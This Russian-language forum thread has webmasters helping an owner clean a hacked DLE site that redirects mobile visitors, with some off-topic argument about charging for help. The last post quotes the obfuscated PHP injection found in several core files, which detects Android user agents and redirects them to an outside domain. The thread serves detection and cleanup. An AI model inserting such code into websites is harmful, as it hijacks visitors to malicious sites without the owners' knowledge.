DarkTower, пообщайтесь если есть форум с другими учасниками хостера. Возможно сам хостер взломан. Ищите шифрованные части в скриптах.
Сайт взломали. Стоит редирект для андроидов и айфонов.
(Ответов: 28, Просмотров: 5405)
- 18.02.2013 23:18Гуру

- Регистрация: 09.10.2011
- Сообщений: 1,813
- Репутация: 251
- 19.02.2013 16:20
- 19.02.2013 17:11
HeavyHell, какие все корыстные. 5 минут времени 30 баксов. Я бы и бесплатно почистил, а благодарность это уже на совести пострадавшего) Мне не тяжело, зато у людей будет впечатление хорошее, рекомендовать будут как знающего специалиста и просто хорошего человека, а не "совсем зажрались, дешевле будет удалить все и заново установить".
Это как с таксистами было (просто для сравнения) - в США 11 сентября людей все бесплатно возили, а наши сволочи во время похожей ситуации в 2-3 раза цену подняли. И вот сейчас компании, которые стекла продают в Челябинске, подняли стоимость на 30-50%. На кол таких сажать надо - у людей беда, а они суки на этом наживаются. Именно из-за таких людей никогда не будет у нас взаимоуважения, доверия, да и в целом благополучия. - 19.02.2013 18:03
а если посмотреть последние измененные файлы, и их заменить из бэкапа?
- 19.02.2013 23:33
OKyJIucT, не в обиду... я бы тоже почистил бесплатно.... только вот я как бэ описываю ситуацию.
1) на хост-аке - 500 сайтов у конкретно одного пользователя.
2) я бесплатно почищу один единственный сайт, что возможно реально займет 5 минут времени, а не окажется что стоит что нить доброе, где в шаблоне к примеру будут зашиты закодированные функции которые придется так же проверять.
3) у недоброго человека шел или бэкдор залит на смежном сайте, где он не светится чем нить левым.
4) завтра недобрый человек замечает что его фуфел отсутствует и все возвращает, да еще пяток сайтов раскрашивает под свои нужды
5) послезавтра человек которому бесплатно помог открывает тред что я редиска и воспользовавшись его доверием навешал левого.
6) я мудак ну и далее по тексту, куча флуда и оправданий...
Вот так в худшем варианте может произойти при не корыстности.
а так то, те кто со мной работал, за редким исключением обращаются снова и так как и говоришь рекомендуют знакомым.
И поверь наслово, бывает так, что стукнутся, надо сделать то и то - сделаю, спрашивают сколько денег - отвечаю не надо.
зы сори за оффтоп, однако накипелоСпасибо сказали:
OKyJIucT(19.02.2013), - 20.02.2013 00:50
Вот обсуждение данной уязвимости, половина воды и флуда но есть и интерестное. Кстате сам автор тоже отписывался.
Спасибо сказали:
5Nizza(20.02.2013), - 20.02.2013 01:15
хм...сегодня как раз удалял на дле зловред, но там какой-то недохакер работал,слишком просто.
В шаблоне главной странице ищем ява скрипт, закомментить и ок все будет.
Обнаружил чисто случайно)
Собственно еще раз меня убедило некогда этим движком не пользоваться.
Мало того что боты его очень любят, так еще и ломают чуть ли не каждый месяц)))))
ПыСы сайт не мой, друга. Сам с дле совсем не работаю. - 20.02.2013 07:34Banned

- Регистрация: 16.02.2013
- Сообщений: 47
- Репутация: 8
Стукни за 5$ проверю, пиши icq 872910
- 20.02.2013 12:41
jaccuzi, ей богу как дети :)
DarkTower проверяйте так же файл index.php а лучше скачивайте файлы сайта к себе на пк и ищите код через программу @Text Replacer так же код повторяется по 2-3 раза
Так же готов помочь форумчанину бесплатно
OKyJIucT, а вы не привыкли к этому ? Европа в плане взаимо помощи между граждан обходит нас на порядок, как пример идет человек упал потерял создание 2 варианта развития событий (Из жизни).
1. Россия (общарят карманы, если начнешь приходить в себя дадут по башке).
2. Европа (по возможности окажут пп, вызовут 911 сопроводят в больницу).
Вот и делайте выводы :) в России главное денег в карман любыми средствами.Последний раз редактировалось zerokl; 20.02.2013 в 12:59.
Спасибо сказали:
OKyJIucT(20.02.2013), - 23.02.2013 17:03
Вообщем всем спасибо за отзывы. Нашёл сегодня за пару минут зловредный код в index.php, engine.php и init.php. Вот собственно и сам код.
if(strchr($_SERVER['H'.'TTP_'.'US'.'ER_A'.'GE'.'NT'],'An'.'dr'.'oid'))
{header('Loc'.'ation: ht'.'tp:/'.'/ref'.'resh-b'.'rowse'.'r.00'.'xf'.'f.net/');die();}
Я искал в поиске по файлам слово "Android", как видно не находило потому что он ковычками разбит был. По дате изменений не мог найти, так как я в этих файлах уже удалял один код, который был описан на первых страницах темы.
Да и в некоторых файлах когда я вначале смотрел дата изменений была 1970 год:) Всем спасибо, кто помог или хотел помочь! Тему можно закрывать.Спасибо сказали:
OKyJIucT(23.02.2013),
Тэги топика:
- android,
- berry,
- engine,
- http_user_agent,
- iphone,
- ipod,
- okyjiuct,
- palmpre,
- strpos,
- _server,
- айфоновый,
- андроид,
- бесплатно,
- быть,
- версия,
- взломать,
- вредоносный,
- дата,
- движок,
- изменение,
- мобильный,
- найти,
- поднять,
- помочь,
- просто,
- работать,
- редирект,
- сайт,
- спасибо,
- стоить,
- тема,
- файл,
- хороший,
- хостер,
- человек
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Помогите, взломали сайт | Консультации по безопасности | 16 | 28.01.2013 10:53 |
Взломали сайт | WordPress | 11 | 14.10.2012 14:08 |
Взломали сайт! | Web программирование | 17 | 15.09.2011 00:09 |
Взломали сайт | Web программирование | 25 | 03.09.2011 02:15 |
Взломали сайт. Где искать | Web программирование | 4 | 23.12.2010 11:09 |












